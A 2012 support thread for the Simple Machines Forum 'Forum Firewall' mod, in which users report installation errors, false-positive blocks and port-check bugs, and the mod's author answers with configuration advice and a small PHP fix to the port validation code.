http://www.simplemachines.org/community/index.php?topic=417490.msg2926798#msg2926798 (http://www.simplemachines.org/community/index.php?topic=417490.msg2926798#msg2926798)

Title: Re: Forum Firewall
Post by: butchs on February 12, 2012, 07:09:05 AM
Whatever you do please follow the instructions and do not to turn on blocking until you have tested the mod for at least two days.
Title: Re: Forum Firewall
Post by: GrahamNR17 on February 15, 2012, 12:12:52 PM
Good afternoon from a noob,

Been using SMF for a while and not really needed to ask fro help, but wonder if I might break my duck with regards this MOD? I have done some serious searching about my small problem but haven't turned anything up.

I've been testing it a few days in testing mode and all is well. However, I have access to my forum from the LAN as well as WAN. If I use my forum on the LAN, as I often do, it obviously throws an error into the log that my IP address is invalid (192.168.0.11, for example).

Is there a way to prevent that from happening, or is it just a little outside of what I can reasonably expect?

With my thanks for any pointers, and for this fine mod.

Best regards,
Graham
Title: Re: Forum Firewall
Post by: butchs on February 15, 2012, 07:05:00 PM
The reason the mod checks those addresses is because a spoofed LAN ip can be dangerous.  You are good as long as you are logged in.  Once your admin cookie expires it will block you on the LAN.

Check the date and time of the last violation.  Log in on the WAN.  The go the the LAN and check the visitor log.  My guess is that you will not be blocked.  If this is true I am sure you can work with it.
Title: Re: Forum Firewall
Post by: impreza on February 20, 2012, 07:37:28 AM
Installed, do not really understand all the options but it certainly can be useful with time. thank you
Title: Re: Forum Firewall
Post by: Drover on February 26, 2012, 02:06:23 AM
I installed and now have this visible at the top of my forum.

// ForumFirewall Start $txt['permissionname_forumfirewall_goodgroup'] = 'Forum Firewall Whitelist Group'; $txt['permissionhelp_forumfirewall_goodgroup'] = 'This option will make a member group exempt from the Forum Firewall bandwidth check. This group will not to be tested for Forum Firewall DOS attempts.'; // ForumFirewall End
Title: Re: Forum Firewall
Post by: butchs on February 26, 2012, 07:53:56 AM
your installation was done incorrectly and added the txt strings AFTER the closing ?> in the language file.

Find the edited language file and move the ?> from where ever it is in the file to the very end...
Title: Re: Forum Firewall
Post by: Drover on February 26, 2012, 08:16:34 PM
Where do I find the language file?  Thanks!
Title: Re: Forum Firewall
Post by: butchs on February 27, 2012, 04:55:05 AM
In your theme/language directory.

Do a search.  This is a common error from either a manual installation or another less tested mod.
Title: Re: Forum Firewall
Post by: societyofrobots on March 13, 2012, 11:32:42 PM
A user reported to me that when attempted to posted this link in my forum:
http://www.atmel.com/PFResults.aspx#%28data:%28area:%27%27,category:%2734864[33180[33085]]%27,pm:!%28%28i:8238,v:!%280,16%29%29,%28i:8394,v:!%280,17%29%29,%28i:8362,v:!%280,27%29%29,%28i:8282,v:!%280,1,2,3,4,5,6,7%29%29%29,view:table%29,sc:1%29

he got this message:
QuoteHTTP Error 403 Forbidden

You don't have permission to access

/robotforum/index.php?action=post2;start=0;board=4 on this server.

Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Request Entity Attack: %27!

If you get this message in error, please contact the ADM1N and provide the date and time of this message.

He said removing the link resolved the issue. I'm not sure if this is something that can be fixed or not, so I'm just letting you know of the issue. I was unable to repeat the error, perhaps because I'm using an admin account?
Title: Re: Forum Firewall
Post by: butchs on March 14, 2012, 04:59:04 AM
He can post without the URL encoding (http://www.w3schools.com/tags/ref_urlencode.asp) of the ASCII character.  The safest thing to do is to strip down the link and give instructions to the URL encoded section.


Ie instead of providing a link to a nasty search link to a result:
http://www.atmel.com/devices/AT90CAN128.aspx
Title: Re: Forum Firewall
Post by: adamanto75 on April 11, 2012, 10:13:43 PM
Hey Everybody

I get this error when I install this mod.

// ForumFirewall Start $txt['permissionname_forumfirewall_goodgroup'] = 'Forum Firewall Whitelist Group'; $txt['permissionhelp_forumfirewall_goodgroup'] = 'This option will make a member group exempt from the Forum Firewall bandwidth check. This group will not to be tested for Forum Firewall DOS attempts.'; // ForumFirewall End

What does this mean, and how do I fix this?

Thanks In Advance

Adamanto75
Title: Re: Forum Firewall
Post by: butchs on April 12, 2012, 06:41:19 AM
Read the link:
http://www.simplemachines.org/community/index.php?topic=417490.msg3232797#msg3232797
Title: Re: Forum Firewall
Post by: Trevor Hale on April 21, 2012, 10:08:49 AM
Maybe I am missing something here, or possible a difference in Language translation but my question is....  When using the Mod for a week in testing mode. I see lots of action in the visitors log.  However, when I turn blocking on (Hence enabling the forum firewall) Do I leave the testing mode checked or unchecked?  I figure Testing mode unchecked and blocking mode on, enables the forum firewall.  I Have logging on, but I still don't see anything in the (Visitor log anymore) nor am I seeing any bans being added in the ban log. I am also running in conjunction with the bad behavior mod, and perhaps it is acting before the firewall is, in either case, I just want to ensure the mod is working properly.  I love it, and I feel it is going to be a great addition to my forum.  "Note" Bad behavior is awesome as well, and has blocked over 209 events since last night at 10pm.

Running SMF2.0.2  Thanks for your response in advance.

Best regards,

Trevor Hale
Title: Re: Forum Firewall
Post by: butchs on April 21, 2012, 05:19:06 PM
If you enable testing and block violations you will block everyone in the visitor log.
Title: Re: Forum Firewall
Post by: Trevor Hale on April 21, 2012, 05:24:35 PM
Perfect,  Thank you. 

Am I correct that Bad behavior will stop 90% of it and the firewall catches anything that it misses?

Thanks again.

Trev
Title: Re: Forum Firewall
Post by: butchs on April 21, 2012, 05:35:04 PM
I use several anti-spam mods/ methods.  I listed them somewhere in one of my threads.  But I make no guarantees for my methods.  All I can tell you is that my bandwidth is under control and I may see one spammer a year.
Title: Re: Forum Firewall
Post by: Trevor Hale on April 21, 2012, 05:38:37 PM
I DId see your list, and I appreciate your efforts.  These are amazing mods.  In any case, thank you for your time.
Title: Re: Forum Firewall
Post by: butchs on April 22, 2012, 09:25:14 AM
You are welcome.
Title: Re: Forum Firewall
Post by: Turt on May 13, 2012, 03:20:19 PM
hi, before this mod used to work, but for some reason i get the following message on the top of every page on my smf 2.0.2 forum.

"// ForumFirewall Start $txt['permissionname_forumfirewall_goodgroup'] = 'Forum Firewall Whitelist Group'; $txt['permissionhelp_forumfirewall_goodgroup'] = 'This option will make a member group exempt from the Forum Firewall bandwidth check. This group will not to be tested for Forum Firewall DOS attempts.'; // ForumFirewall End "

Can someone tell me how to fix it? or can they fix it for me, and give me a "bug-free" link of this mod?

Thanks :)
- thanks to the mod maker as well, for making such a wonderful mod  ;)
- my theme is: "Insidious II" with some simple edit with the forum rank images.
Title: Re: Forum Firewall
Post by: butchs on May 13, 2012, 08:56:09 PM
Your error has nothing to do with this mod.  You added another mod after installing this mod that did not properly close "?>" in the language file "modifications.english.php".  Uninstall the last installed mod and ask the author to fix the bad code.
Title: french translate for galery for forum firewall
Post by: TradeZone.fr on May 24, 2012, 08:46:59 PM
 french translate  ;)
Title: Re: Forum Firewall
Post by: Texan78 on May 24, 2012, 09:59:47 PM
Is there any kind of docs that describes the settings in more detail?

-Thanks
Title: Re: Forum Firewall
Post by: butchs on May 25, 2012, 06:53:39 AM
There is built in help.  Click on the ? in the admin panel.

Plus if you search this thread for the word HELP you will see some detailed mini-tutorials.
:)
Title: Re: Forum Firewall
Post by: blandickclara on May 25, 2012, 07:50:12 AM
firewall protection is important of your system and it is protect your system from virus.
Title: Re: Forum Firewall
Post by: Texan78 on May 25, 2012, 12:59:46 PM
Quote from: butchs on May 25, 2012, 06:53:39 AM
There is built in help.  Click on the ? in the admin panel.

Plus if you search this thread for the word HELP you will see some detailed mini-tutorials.
:)

Doh! I keep forgetting about those things! Thanks, that was exactly what I was looking for.

Title: Re: Forum Firewall
Post by: Texan78 on May 25, 2012, 06:58:21 PM
I am getting email alerts which I set up so I can test and monitor this before actually setting it to ban. I am getting DOS Attack notifications from links that are valid links, or does that mean those are the links they are attempting the hack?
Title: Re: Forum Firewall
Post by: butchs on May 25, 2012, 08:58:02 PM
Not sure since I do not know your settings.  You could be blocking good guys...  However, I created that feature because Bots were pretending to be google were hitting my site hard.  This mod stopped them.  If you search back some you will see that I recommend that you get a google webmasters account so you can adjust their settings and use the robots feature.
Title: Re: Forum Firewall
Post by: Texan78 on May 25, 2012, 10:24:20 PM
I have a google webmasters account set up. What is strange is when I visit those links they are valid links. I have attached a screenshot of my settings.
Title: Re: Forum Firewall
Post by: butchs on May 27, 2012, 07:10:43 AM
Robots text validation is incorrectly set up.  Read this (http://www.simplemachines.org/community/index.php?topic=417490.msg3131785#msg3131785).

If you have a robots text file it was not read by the mod during installation.  If you do not have one you should make one.  A correctly installed robots file will have the robots actions field populated.  You need to set the crawl delay at google and in your robots text file to prevent blocking the wrong bot.
Title: Re: Forum Firewall
Post by: Texan78 on May 27, 2012, 01:42:04 PM
Thanks, I am trying to make some sense of this. I did and do have a robots.txt file in place. I added the additions suggested in the link you posted. What I am not sure of is how to set the crawl delay but not affect Google and what's a good crawl rate? Also where exactly in webmaster tools is this set? I couldn't find it. I have attached my robots.txt file. Does it look right?


-Thanks
Title: Re: Forum Firewall
Post by: butchs on May 27, 2012, 07:33:51 PM
You uploaded two files...  Please delete the robots,txt you are not using...  Check out this link (http://www.simplemachines.org/community/index.php?topic=417490.msg2977618;topicseen#msg2977618)...
8)

PS:   Change your salt.  Everyone knows it now...
Title: Re: Forum Firewall
Post by: Texan78 on May 29, 2012, 01:56:58 AM
That is the same robots.txt file just two different screen shots. One of the top and one of the bottom so you can see they whole thing.

Here is the issue I am confused about. I use the SMF SEO Pro Mod which enables pretty action URLs. So that is why the links are like that at the top. If I remove those will that not mess up my SEO for bots crawling those links?
Title: Re: Forum Firewall
Post by: butchs on May 29, 2012, 09:09:38 AM
I went to your website and I still see "http://www.weather-connection.com/index.php?action=search" so you should get rid of that extra stuff.  If you do not have all your action urls then I would not use this feature.

Your "Robots.txt action's" should be like:
action=activate|action=admin|action=arcade|action=calendar|action=collapse|action=deletemsg|action=editpoll|action=help|action=helpadmin|action=lock|action=login|action=logout|action=markasread|action=mergetopics|action=mlist|action=modifykarma|action=movetopic|action=notify|action=notifyboard|action=pm|action=post|action=profile|action=register|action=removetopic2|action=reporttm|action=search|action=sendtopic|action=splittopics|action=stats|action=sticky|action=trackip|action=unread|action=unreadreplies|action=who

Your crawl delay is 10.  The google crawl delay at googlewebmasters should be set too...  I would make your "Trigger (#/sec) " .7.
Title: Re: Forum Firewall
Post by: Texan78 on May 29, 2012, 03:23:42 PM
Quote from: butchs on May 29, 2012, 09:09:38 AM
I went to your website and I still see "http://www.weather-connection.com/index.php?action=search" so you should get rid of that extra stuff.  If you do not have all your action urls then I would not use this feature.

Yes, currently I have that function disabled because I have two menu items that are not working correctly. Once I am able to get that issue resolved I will be enabling that function. I am thinking though if it is to much trouble just not enabling those action URLs back.

Quote from: butchs on May 29, 2012, 09:09:38 AM
Your "Robots.txt action's" should be like:
action=activate|action=admin|action=arcade|action=calendar|action=collapse|action=deletemsg|action=editpoll|action=help|action=helpadmin|action=lock|action=login|action=logout|action=markasread|action=mergetopics|action=mlist|action=modifykarma|action=movetopic|action=notify|action=notifyboard|action=pm|action=post|action=profile|action=register|action=removetopic2|action=reporttm|action=search|action=sendtopic|action=splittopics|action=stats|action=sticky|action=trackip|action=unread|action=unreadreplies|action=who

So when I put this in the robots.txt file will it auto populate in the text box in the admin control panel for the FF or will I need to manually enter it in there too?

Quote from: butchs on May 29, 2012, 09:09:38 AM
Your crawl delay is 10.  The google crawl delay at googlewebmasters should be set too...  I would make your "Trigger (#/sec) " .7.

I can't find in the google webmaster tools where to set this crawl rate. Where do I find this option when I am in the webmaster tools?

-Thanks
Title: Re: Forum Firewall
Post by: butchs on May 29, 2012, 07:58:40 PM
Quote from: Texan78 on May 29, 2012, 03:23:42 PM
So when I put this in the robots.txt file will it auto populate in the text box in the admin control panel for the FF or will I need to manually enter it in there too?

That information goes in the mods admin panel.  If you uninstall and reinstall the mod it should automatically populate.  Otherwise you have to manually enter it.

Quote from: Texan78 on May 29, 2012, 03:23:42 PM
I can't find in the google webmaster tools where to set this crawl rate. Where do I find this option when I am in the webmaster tools?

As per (http://support.google.com/webmasters/bin/answer.py?hl=en&answer=48620).  To change the crawl rate:

   1. On the Webmaster Tools Home page, click the site you want.
   2. Under Configuration, click Settings.
   3. In the Crawl rate section, select the option you want.

The new crawl rate will be valid for 90 days.
8)
Title: Re: Forum Firewall
Post by: BubblePig on June 13, 2012, 02:23:20 PM
I am one of the admins of an SMF site, even though my skills are almost nonexistent.
A member asked this question a while back:
QuoteWhy does the text on the bottom of the page

"Protected by: Forum Firewall © 2010-2011"

link to [eastcoastrollingthunder] ?

IIRC, when I first looked into it in late April of this year, the link on this site redirected there as well, but I may be mistaken. In any event, that link is the 5th entry when I google "forum firewall" . Also, the links "BH MOD © 2011" and "butchs" on the main page of that site recursively redirect to back the main page of that site.

I don't suppose anyone knows why that might be?
Title: Re: Forum Firewall
Post by: butchs on June 13, 2012, 06:28:53 PM
My site and your permission to use software that I spent many months developing for free.
Title: Re: Forum Firewall
Post by: BubblePig on June 17, 2012, 09:54:53 AM
Fair enough. I just wanted to make sure it was your site and not somebody else who was hijacking it.

PS Thanx for the mod.
Title: Re: Forum Firewall
Post by: butchs on June 17, 2012, 08:34:15 PM
Hijacking my site is not a good idea as it will incise me to even more devious programming...
;)
Title: Re: Forum Firewall
Post by: phyo on July 17, 2012, 05:22:03 PM
Quote from: Texan78 on May 25, 2012, 06:58:21 PM
I am getting email alerts which I set up so I can test and monitor this before actually setting it to ban. I am getting DOS Attack notifications from links that are valid links, or does that mean those are the links they are attempting the hack?

Me too i got error like that and now all my normal user are can't go to some post and other user profile.when they go firewall is block for them.only admin can go and see those permission. normally i has giving all those kind of permission to user but they can't accept it.
Title: Re: Forum Firewall
Post by: butchs on July 17, 2012, 08:05:24 PM
You are not using the mod correctly.  You need to whitelist you regular members.  Go to "admin/ Members/  permissions / General Permissions - "Regular Members"/ Forum Firewall Whitelist Group" and make your members EXEMPT.

If you are getting hits due to the crawl rate then by all means read my reply to the person you quoted.  I am not going to repeat such a recent post.

Security is only as good as the one who implements it...

Search and read the HELP's I posted in this thread and within the mod.

You need to run the mod for a few days with logging enabled before enabling blocking to work out the issues particular to your forum.
8)
Title: Re: Forum Firewall
Post by: crazyearner on July 17, 2012, 09:38:30 PM
big problem i got on my site. Today i got access to my itnenret once again and everything running good

However access to site is forbidden

You don't have permission to access

/admin/?area=permissions on this server.

Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Invalid ip!

If you get this message in error, please contact the ADM1N and provide the date and time of this message.

Some help needed to restore access
Title: Re: Forum Firewall
Post by: phyo on July 18, 2012, 03:18:22 AM
Quote from: butchs on July 17, 2012, 08:05:24 PM
You are not using the mod correctly.  You need to whitelist you regular members.  Go to "admin/ Members/  permissions / General Permissions - "Regular Members"/ Forum Firewall Whitelist Group" and make your members EXEMPT.

If you are getting hits due to the crawl rate then by all means read my reply to the person you quoted.  I am not going to repeat such a recent post.

Security is only as good as the one who implements it...

Search and read the HELP's I posted in this thread and within the mod.

You need to run the mod for a few days with logging enabled before enabling blocking to work out the issues particular to your forum.
8)

No I used all correctly all permission all click correctly.i giving whitelist to all user expect guest.but still having issued with forum firewall has block the ip ------- .
Title: Re: Forum Firewall
Post by: butchs on July 18, 2012, 06:50:33 AM
I have no idea what you are talking about.  If you have an issue be specific.  Copy your error log entry and poste it here.

As I said before you are not using the mod correctly.  You need to turn off blocking until you work out the kinks.  Look at your log and adjust the settings.
Title: Re: Forum Firewall
Post by: RickDen on July 19, 2012, 07:22:55 AM
I installed the firewall mod and now I cannot run maintenance tasks.  The error I receive is

Fatal error: Cannot redeclare scheduled_forumfirewall() (previously declared in /home/content/n/o/s/nosf99/html/can-garden/forum/Sources/ScheduledTasks.php:1646) in /home/content/n/o/s/nosf99/html/can-garden/forum/Sources/ScheduledTasks.php on line 1722

OK, what do I need to do?
HELP!
Title: Re: Forum Firewall
Post by: butchs on July 20, 2012, 06:59:24 AM
What version SMF do you have?  Manual or custom install?  Are you using a custom theme?
Title: Re: Forum Firewall
Post by: RickDen on July 20, 2012, 09:10:40 AM
I'm using SMF 2.0.2 and the Dirt3 Theme.
Title: Re: Forum Firewall
Post by: NanoSector on July 20, 2012, 10:50:52 AM
Can you attach said file in your next post? :)
Title: Re: Forum Firewall
Post by: RickDen on July 20, 2012, 04:20:27 PM
There ya go... and it was applied through adding a package through the SMF admin panel.

I installed the mod initially and everythign went smoothly.  But over the next few days, while running in test mode I was seeing a lot of errors show up in my logs, so through the acp, I uninstalled it.  That crashed my system completely.  Completely.  So I restored from backup of the /forum folder from my local hard drive via FTP.  That corrected the crisis.

But then, when I tried to go into the scheduled tasks, that is the error I get.  Yers, I have tried to re-install (one time) to see if I could correct it, and I've probably done more hard than good.

SMF 2.0.2
Dirt 3 theme
Auto installed
Auto Un-installed
Title: Re: Forum Firewall
Post by: butchs on July 20, 2012, 08:01:11 PM
Your problem is due to human error.   O:) According to that file you uploaded, you performed a double installation of the mod.  This can happen with any SMF mod.  I removed the second installation from the attached file.  If you uninstalled the mod then you need to remove the code at the end between "// ForumFirewall Start" and "// ForumFirewall End".

If you uninstalled the mod then you will need to manually review your code and remove the duplicates.  One trick is to leave all the code then, copy the zipped mod to your package directory and uninstall the mod a second time using package manager.

All the above is not part of this support topic.  It is better dealt with SMF support as this is really human error, not a issue with this mod.
Title: Re: Forum Firewall
Post by: RickDen on July 20, 2012, 08:07:54 PM
I greatly appreciate your assistance.  I figured it was something I had done  but had no clue as to what seeing how when I installed everything fell apart.  But then I'm mechanically inclined.... I can screw anything up.

Thanks again.
Title: Re: Forum Firewall
Post by: butchs on July 23, 2012, 08:47:12 PM
Thank you for asking the question and not shooting first...  Users like you are the reason I share some of my code...
Title: Re: Forum Firewall
Post by: MiY4Gi on July 25, 2012, 08:35:21 AM
I dunno. That "duplicate installation" thing happened with one of the other mods on my forum. It's specifically a mod that I'm busy troubleshooting. The un-installer pretended to uninstall a mod, but it didn't undo all of the changes it made to the files, even though no un-installation problems were reported by the installer. So when I reinstalled the mod, some files ended up with duplicate code. I don't believe it was a mistake on my part.

In any case, this could be human error, but it could also be a problem with the SMF installer itself, or the mod package. It could even be cosmic radiation that confused your computer, no ******. However, who or what's to blame isn't really important here, unless the problem occurs frequently enough to warrant special attention.
Title: Re: Forum Firewall
Post by: Texan78 on August 07, 2012, 12:04:12 AM
Quote from: butchs on May 29, 2012, 07:58:40 PM
To change the crawl rate:

   1. On the Webmaster Tools Home page, click the site you want.
   2. Under Configuration, click Settings.
   3. In the Crawl rate section, select the option you want.

The new crawl rate will be valid for 90 days.
8)

I am revisiting this to make sure I have everything set correctly in all my mods for the launch. The only question I have is in my robots.txt the crawl rate is set to 10, but in Webmaster Tools the highest you can set it is 2.

So should I set it to 2 and then change it to 2 in the robots.txt? I believe I read the recommended setting was 10 but that can't be achieved in the webmaster tools so please correct me if I am wrong.

-Thanks
Title: Re: Forum Firewall
Post by: KRISHNA0007 on August 07, 2012, 03:25:45 PM
thanks for this extra layer security for my forum
Title: Re: Forum Firewall
Post by: butchs on August 07, 2012, 09:27:26 PM
The setting on the mod is the "Trigger (#/sec) ".  So if your have Google set to 2.  It can hit you're site every 2 seconds.  The mod counts the hits in your cache.  So if you have your cache set to 20, Google can hit you 10 times.  That will give Google a minimum Trigger of 10/20 = 0.5.

Google ignores robots.tst.  So your setting there does not matter.   In 20 seconds the bot will visit you 2 times.  A minimum Trigger of 2/20 = 0.1.

If you have a crawl rate of .7, a bot will need to hit you 20 x .7 - 14 times to get blocked.  This Trigger is a good starting point.  I do not recommend going below it.

Set it to what you want.  I suggest:
robots.tst 10
Google 2
Trigger .7


If you uninstall the mod and reinstall it, the mod will try to read your robots.tst file.  Or just make your changes manually...

make sure you test before going live and start blocking.
Title: Re: Forum Firewall
Post by: emwe on August 14, 2012, 10:47:12 AM
Hello,

I have installed that mod on SMF 2.0.2 a few days ago and so far it looks good. Great work. Thank you for doing that.

But I have some little problems

1. Server Ports
I want to have the server available on ports 80 and 443. When I add 80|443 into the server port field I see warnings for both ports in the firewall (Invalid Port Access: 443! or Invalid Port Access: 80!). As long as I add only one port I get the warning only for the other port.
2. I get a lot of entries like this: Hack: %3d!
Header: GET /index.php?action=helpadmin%3Bhelp%3Dforumfirewall_good_ua HTTP/1.1 facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
I assume this is because there is a  %3d in the SQL Injection rules.
However that URL is generated by another mod Social Buttons http://custom.simplemachines.org/mods/index.php?mod=3354.
Adding that useragent to the ua whitelist did not help. This is still logged.
Question: What do I risk if I remove %3d from the SQL Injection Rules?
Title: Re: Forum Firewall
Post by: butchs on August 14, 2012, 09:25:40 PM
Quote from: emwe on August 14, 2012, 10:47:12 AM
1. Server Ports
I want to have the server available on ports 80 and 443. When I add 80|443 into the server port field I see warnings for both ports in the firewall (Invalid Port Access: 443! or Invalid Port Access: 80!). As long as I add only one port I get the warning only for the other port.

Oh, I will look at that this weekend.  Could be an error in the code.

Quote from: emwe on August 14, 2012, 10:47:12 AM
2. I get a lot of entries like this: Hack: %3d!
Header: GET /index.php?action=helpadmin%3Bhelp%3Dforumfirewall_good_ua HTTP/1.1 facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
I assume this is because there is a  %3d in the SQL Injection rules.
However that URL is generated by another mod Social Buttons

If you use that mod you will need to remove "|%3d" from the SQL Injection rules.

In Hexadecimal %3d represents a '='.  Could be used against you.  But you have other protection measures.  Not sure if it is a big deal...  The again, you could change it from "%3d" to "&#61" which is a more preferred sanitization.
Title: Re: Forum Firewall
Post by: Texan78 on August 14, 2012, 10:35:19 PM
Quote from: butchs on August 07, 2012, 09:27:26 PM
The setting on the mod is the "Trigger (#/sec) ".  So if your have Google set to 2.  It can hit you're site every 2 seconds.  The mod counts the hits in your cache.  So if you have your cache set to 20, Google can hit you 10 times.  That will give Google a minimum Trigger of 10/20 = 0.5.

Google ignores robots.tst.  So your setting there does not matter.   In 20 seconds the bot will visit you 2 times.  A minimum Trigger of 2/20 = 0.1.

If you have a crawl rate of .7, a bot will need to hit you 20 x .7 - 14 times to get blocked.  This Trigger is a good starting point.  I do not recommend going below it.

Set it to what you want.  I suggest:
robots.tst 10
Google 2
Trigger .7


If you uninstall the mod and reinstall it, the mod will try to read your robots.tst file.  Or just make your changes manually...

make sure you test before going live and start blocking.

Thank you for your help Butchs, I have used your suggestion and everything seems to be functioning smoothly. Now I can just tweak as needed as the forum grows should issues arise.

-Thanks!
Title: Re: Forum Firewall
Post by: butchs on September 02, 2012, 01:49:18 PM
Quote from: butchs on August 14, 2012, 09:25:40 PM
Quote from: emwe on August 14, 2012, 10:47:12 AM
1. Server Ports
I want to have the server available on ports 80 and 443. When I add 80|443 into the server port field I see warnings for both ports in the firewall (Invalid Port Access: 443! or Invalid Port Access: 80!). As long as I add only one port I get the warning only for the other port.

Oh, I will look at that this weekend.  Could be an error in the code.

Can you try this fix.  Search ForumFirewall.php
foreach ($good_port as $good_ports) {
$pos = strpos($forumfirewall_port, $good_ports);
if ($pos === false) {
//  Good port is not being used so block
$forumfirewall_data['sql_reason'] = $forumfirewall_port;
$result[0] = '11';
unset($good_port, $good_ports);
forumfirewall_block($forumfirewall_data, $result);
return;
} }


replace with:
$ffports_validated = false;
foreach ($good_port as $good_ports) {
$pos = strpos($forumfirewall_port, $good_ports);
if ($pos !== false) {
//  Good port is detected
$ffports_validated = true;
} }
if ($ffports_validated === false) {
//  Good port is not being used so block
$forumfirewall_data['sql_reason'] = $forumfirewall_port;
$result[0] = '11';
unset($good_port, $good_ports);
unset($ffports_validated);
forumfirewall_block($forumfirewall_data, $result);
return;
}
unset($ffports_validated);




Title: Re: Forum Firewall
Post by: tMicky on September 07, 2012, 04:50:34 PM
For some reason, this Firewall Mod and the Bad Behavior Mod - have an issue with:
./Themes/Glacier/index.template.php - for both mods, I got Test Failed.

I haven't had issues with other mods and this Theme.
Title: Re: Forum Firewall
Post by: Kindred on September 07, 2012, 06:08:03 PM
as I said in the other thread... Glacier themes are horrible. almost no mod will install automatically into them, so get used to doing manual installations.

(and please try using search and/or the wiki?)
http://wiki.simplemachines.org/smf/Error_in_mod_installation
Title: Re: Forum Firewall
Post by: butchs on September 07, 2012, 09:06:49 PM
You should try the mod parser at SMF Helper. (http://community.smfhelpers.com/parser.php)
:laugh:
Title: Re: Forum Firewall
Post by: Kindred on September 07, 2012, 09:10:35 PM
the mod site itself has a mod parser built in and accessible form each mod's download page.
Title: Re: Forum Firewall
Post by: Bigguy on September 07, 2012, 09:23:09 PM
Kindred is right but I gotta say thanks for postin the link Butchs. ;)
Title: Re: Forum Firewall
Post by: gwc16 on September 21, 2012, 07:43:43 PM
I installed this mod on SMF 2.0.2 and now I get this message on top of the forum pages.

"// ForumFirewall Start $txt['permissionname_forumfirewall_goodgroup'] = 'Forum Firewall Whitelist Group'; $txt['permissionhelp_forumfirewall_goodgroup'] = 'This option will make a member group exempt from the Forum Firewall bandwidth check. This group will not to be tested for Forum Firewall DOS attempts.'; // ForumFirewall End ".

I think this was caused by another so called "tested" mod install aftewards so I unistalled it and still got the above message on the forum pages at the top.

I next uninstalled Forum Firewall and still got the message. So I uninstalled all mods and I still get this message.

I then restored my backup db I made before any installs and the message is still there.

Does anyone know which file or files I need to edit to remove this message from my forums?

Thanks,

Gary
Title: Re: Forum Firewall
Post by: Kindred on September 21, 2012, 09:35:48 PM
well, first of all, you can try using search....    this issue arises fairly frequently

Some other mod changed your modifications.english.php and then this mod added the text strings after the closing ?> statement.
You need to move the ?> from wherever it is to the very end of the file
Title: Re: Forum Firewall
Post by: PLAYBOY on October 04, 2012, 12:30:33 PM
Ok. Since i got locked out of my forum then slowwed it down so much, i think its best to ask few questions here before actually start using this mod.
1- Does it slow down the load of pages/forum at all if you dont check any of the boxes ?
2- Which security options i should check if i dont want my forum to slow down?
3- Is there any kinda UNDO button? or a quick way to reverse the most recent changes? or at least go back to default settings quickly? So when you make a mistake and block yourself or mess up your forum you can just go back easyly.
4- How much resource does this mod use? Like does it use lots of memory or cpu for each inqury of a visitor?
5- Which options i should use if i dont want it to use so much memory?
6- Does it do anything (keep you secure from anything) if i dont check any of the boxes?
7- What are the suggested settings for a forum which gets about 3000 visitors a day?
8- My forum is invitational only, so is thete anyway to detect multiple (not only one or two) register attempts?

Thank you very much. So far it looks like one of the best, most useful mods of smf. Very advanced and smart.
Title: Re: Forum Firewall
Post by: butchs on October 04, 2012, 09:11:11 PM
Oh gosh...  So many questions....

1.  If the mod is not enabled it does nothing.
2.  First you MUST whitelist all your members.   Second I posted minimum recommendations:  "Enable Testing", "Logging", "DOS Attack" and "Enable IP Validation".
3.  No undo button.  Follow the instructions and test the mod for a few days before enabling blocking.  See below.
4.  Utter BULL!  There are few DB queries.  I have many years developing software and always minimize the use of memory.  Unlike many php developers, I take great pains to remove all allocated memory as soon as possible! 
5.  Do you get anything in your hosts error log?  Is your host a over-seller?  You are not using Aeva by any chance?
6.  Nothing.
7.  I do this stuff for free so I do not have that data.  For larger forums, I recommend that you you use cache.
8.  This mod does not look at or care about register attempts.  If that is your issue, look at your settings.  Chances are a bot is hitting you hard.  Properly set this mod will block fast bots that kill processor use.  When used correctly, you will see 1-2 weeks of bots act desperate because they lost a source of information, get blocked and banned then they go elsewhere.  I created this mod to decrease my bandwidth.  This mod when used correctly will reduce bandwidth when bad bots attack.  I lost 7GB in one month!

The mod has built i n help click the "?" next to the feature for more information.

Search for HELP in this thread for some of my tutorials.  Read them...  I have several posts in this thread with bold capitol letter HELP that explains some of the more complicated features of the mod.

Run the mod for a few days and make sure you will not ban your critical members or yourself then select "Block Violations" to block access.
Title: Re: Forum Firewall
Post by: PLAYBOY on October 05, 2012, 01:34:10 AM
Thank you very much for answering all.
Again, this is one of the best mods for SMF
I even think it could be added as a default "Security Tab" in admin panel in all smf installation.

Quote5.  Do you get anything in your hosts error log?  Is your host a over-seller?  You are not using Aeva by any chance?
Where is that? Which file is it exactly?
I have VPS so they cant oversell it.
Yes i do have Aeva.

Quote1.  If the mod is not enabled it does nothing.
You mean if none of the boxes are checked right?
Because i dont see any enable button.

QuoteFirst you MUST whitelist all your members.
How? I see only one whitelist option and that is for User Agent. Also what am i gonna whitelist? Their IP, hostname, membername? If IP, then it would be pretty hard because 90% of my members use dynamic IP as i do also.

I am thinking about translation this to Turkish. Is it only the modifications.english.com? or is there any more to translate? Would you give me all the text to translate?

I think i had enabled only sql injection featured but I kept getting google bot logs as hack attempt. See below.
IP Address66.249.73.54, Hack:  Repeated!
for /forum/index.php?topic=5607.10

IP Address66.249.73.54, Hack:  Repeated!
for /forum/index.php?action=media;sa=item;in=3340sort=2;desc

IP Address66.249.73.54, Hack:  Repeated!
for /forum/index.php?action=media;sa=item;in=3desc

IP Address66.249.73.54, Hack:  %3d!
for /forum/index.php?yshout&amp;action=media&amp;sa=item&amp;in=826sort%3D4&amp;id=826sort%3D4

IP Address66.249.73.54, Hack:  %3d!
for /forum/index.php?yshout&amp;action=media&amp;sa=item&amp;in=29818sort%3D1&amp;asc=&amp;id=29818sort%3D1
Title: Re: Forum Firewall
Post by: butchs on October 05, 2012, 07:20:39 AM
Answers in order.  Sorry but I have to go to work...

Usually in Cpanel.
When hit fast, Aeva uses lots of bandwidth because it overuses SMF's action array.  A bad bot can hit it hard and tack on some big numbers...  DOS attack and Robots.tst are the best weapons against this type of attack.  I made HELP's for both of them.

Enable Testing has a checkbox
Block Violations has a checkbox

Search for the capitol bold HELP in this thread.  If yo can not find it I can for you when I get back from work.

There is a translation package in the mod section where you download the mod.

remove |%3d from sql injection.

Consider reading the HELP on robots.txt to clean up the fake google bots...
Title: Re: Forum Firewall
Post by: PLAYBOY on October 08, 2012, 06:12:16 AM
We should have an option to delete the logs anytime we want. I saw only one option to delete them and its in the scheduled tasks for the logs older than 7 days.
Title: Re: Forum Firewall
Post by: butchs on October 09, 2012, 07:09:16 AM
I will add it to my to do list.
:)
Title: Re: Forum Firewall
